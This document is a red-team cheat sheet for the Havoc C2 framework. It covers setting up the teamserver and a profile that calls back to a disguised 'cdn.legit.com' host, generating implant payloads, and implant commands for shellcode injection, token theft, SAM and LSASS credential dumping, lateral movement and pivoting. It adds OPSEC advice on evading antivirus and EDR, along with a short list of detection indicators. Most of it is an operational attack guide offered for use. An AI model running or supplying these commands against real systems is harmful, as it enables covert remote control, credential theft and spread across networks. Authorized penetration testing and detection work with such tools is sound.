HAVOC-C2
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Open-source C2 framework focused on evasion with indirect syscalls, sleep obfuscation, and modern anti-detection techniques.
INSTALLATION & SETUP#
# Clone repository git clone https://github.com/HavocFramework/Havoc cd Havoc # Build teamserver cd teamserver go build # Or: make # Build client (Qt-based GUI) cd ../client make # Start teamserver ./teamserver server --profile profiles/havoc.yaotl # Start client ./Havoc # Default profile location ls profiles/havoc.yaotl
TEAMSERVER CONFIGURATION#
# havoc.yaotl profile format
Teamserver {
Host = "0.0.0.0"
Port = 40056
Build {
Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
Compiler86 = "/usr/bin/i686-w64-mingw32-gcc"
Nasm = "/usr/bin/nasm"
}
}
Operators {
user "operator1" {
Password = "P@ssw0rd123"
}
user "operator2" {
Password = "An0therP@ss"
}
}
Listeners {
Http {
Name = "HTTPS Listener"
KillDate = "2024-12-31 00:00:00"
WorkingHours = "8:00-18:00"
Hosts = ["cdn.legit.com"]
HostBind = "0.0.0.0"
HostRotation = "round-robin"
PortBind = 443
PortConn = 443
Secure = true
UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Uris = ["/api/v1/data", "/static/js/app.js"]
Headers = [
"X-Requested-With: XMLHttpRequest",
"Content-Type: application/json"
]
Response {
Headers = [
"X-Frame-Options: DENY",
"Content-Type: application/json"
]
}
}
}
Demon {
Sleep = 10
Jitter = 20
TrustXForwardedFor = false
Injection {
Spawn64 = "C:\\Windows\\System32\\notepad.exe"
Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
}
}
LISTENERS#
# Via GUI: Havoc > Listeners > Add # HTTP/HTTPS Listener Name: Listener name Hosts: Callback domains/IPs Port: Callback port Secure: true for HTTPS KillDate: Agent expiration URIs: Custom callback URIs Headers: Custom HTTP headers # SMB Listener (for lateral movement) Pipe Name: Custom named pipe # External C2 Listener Endpoint: Custom protocol handler
DEMON AGENT#
The Demon is Havoc's primary implant (Windows-focused). Key Features: - Position-independent code - Indirect syscalls (SSN sorting, syscall address resolution) - Sleep obfuscation (Ekko, Zilean, Foliage techniques) - AMSI/ETW patching - Token manipulation - Inline .NET execution - BOF (Beacon Object File) support - Custom reflective loader - Stack spoofing - Return address spoofing - Module stomping
GENERATING PAYLOADS#
# Via GUI: Havoc > Payloads > Generate
# Payload options
Format: Windows Exe, Windows Service Exe,
Windows DLL, Windows Shellcode, Raw
Architecture: x64, x86
Listener: Select configured listener
Sleep Technique: Ekko, Zilean, Foliage
Indirect Syscall: Enabled/Disabled
# Sleep obfuscation techniques
Ekko: Timer-based sleep with ROP chain (RtlCreateTimer)
Zilean: APC-based sleep obfuscation
Foliage: APC-based with NtApcRoutine
DEMON COMMANDS#
# System Information demon> whoami # Current user demon> pwd # Working directory demon> dir # List directory demon> cd <path> # Change directory demon> env # Environment variables demon> hostname # Machine hostname demon> ipconfig # Network interfaces demon> ps # Process list demon> cat <file> # Read file contents # File Operations demon> upload /local/path /remote/path # Upload file demon> download C:\path\file # Download file demon> cp <src> <dst> # Copy file demon> mv <src> <dst> # Move file demon> rm <file> # Delete file demon> mkdir <dir> # Create directory # Execution demon> shell whoami # Run via cmd.exe demon> powershell Get-Process # PowerShell execution demon> execute-assembly Rubeus.exe args # .NET in-memory demon> shellcode inject x64 <pid> /path/to/sc.bin # Inject shellcode demon> shellcode spawn x64 /path/to/sc.bin # Spawn + inject # BOF Execution demon> inline-execute /path/to/bof.o arg1 arg2 # Token Manipulation demon> token steal <pid> # Steal token from process demon> token make DOMAIN\user pass # Create token demon> token list # List tokens demon> token revert # Revert to original token demon> token remove <token_id> # Remove token demon> token getuid # Current token user # Process Injection demon> inject x64 <pid> /path/to/shellcode.bin demon> spawn x64 /path/to/shellcode.bin # Lateral Movement demon> jump psexec <target> <listener> # PsExec demon> jump winrm <target> <listener> # WinRM demon> jump wmi <target> <listener> # WMI # Pivoting demon> socks add <port> # Start SOCKS5 proxy demon> socks list # List proxies demon> socks kill <port> # Stop proxy demon> rportfwd add <lport> <target> <tport> # Reverse port forward demon> rportfwd list demon> rportfwd remove <id> # Credential Access demon> hashdump # Dump SAM hashes demon> lsass dump # Dump LSASS memory demon> token steal <pid> # Steal credentials from process # Sleep & Jitter demon> sleep 30 # Set sleep to 30 seconds demon> sleep 60 30 # 60s sleep, 30% jitter # Process Configuration demon> config inject spawn64 C:\Windows\System32\svchost.exe demon> config inject spawn32 C:\Windows\SysWOW64\svchost.exe # Miscellaneous demon> screenshot # Take screenshot demon> exit # Kill agent demon> checkin # Force check-in
EXTENDING HAVOC#
# BOF Support - Havoc supports Cobalt Strike BOFs natively - Use inline-execute for BOF execution - Compatible with most CS BOF toolkits # Python API for custom scripts - Havoc provides a Python scripting API - Scripts placed in scripts/ directory - Access to agent tasking, listener management, UI hooks # Third-party modules - Community BOF collections work directly - CS-Situational-Awareness-BOF - TrustedSec SA BOF - InlineWhispers for syscall BOFs
OPSEC CONSIDERATIONS#
- Use Ekko/Zilean/Foliage sleep obfuscation - Indirect syscalls avoid userland hooks - Customize spawn-to process (avoid suspicious defaults) - Set appropriate sleep intervals and jitter - Use HTTPS with valid certificates and domain fronting - Customize HTTP profiles (URIs, headers, user agents) - Set kill dates on implants - Use working hours to limit callback times - Use BOFs over fork-and-run for stealth - Avoid disk writes; prefer in-memory execution - Stack spoofing hides call origin from ETW - Rotate infrastructure during engagements
DETECTION INDICATORS#
- Default named pipes for SMB C2 - Sleep pattern analysis (even with obfuscation) - Indirect syscall patterns (SSN resolution) - AMSI/ETW patch detection - Process injection events (Event 8, Sysmon) - Unusual parent-child process relationships - HTTP traffic patterns matching profile defaults - In-memory .NET CLR loading - Token manipulation events (Event 4624, 4672)
COMPARISON WITH OTHER C2#
Feature Havoc Cobalt Strike Sliver ------- ----- ------------- ------ License OSS Commercial OSS Sleep Obfusc. Yes Limited No Indirect Syscall Yes Via BOF No BOF Support Yes Native Via armory .NET Execution Yes Yes Yes Platforms Windows Win/Lin/Mac All SOCKS Proxy Yes Yes Yes GUI Qt Java CLI Multiplayer Yes Yes Yes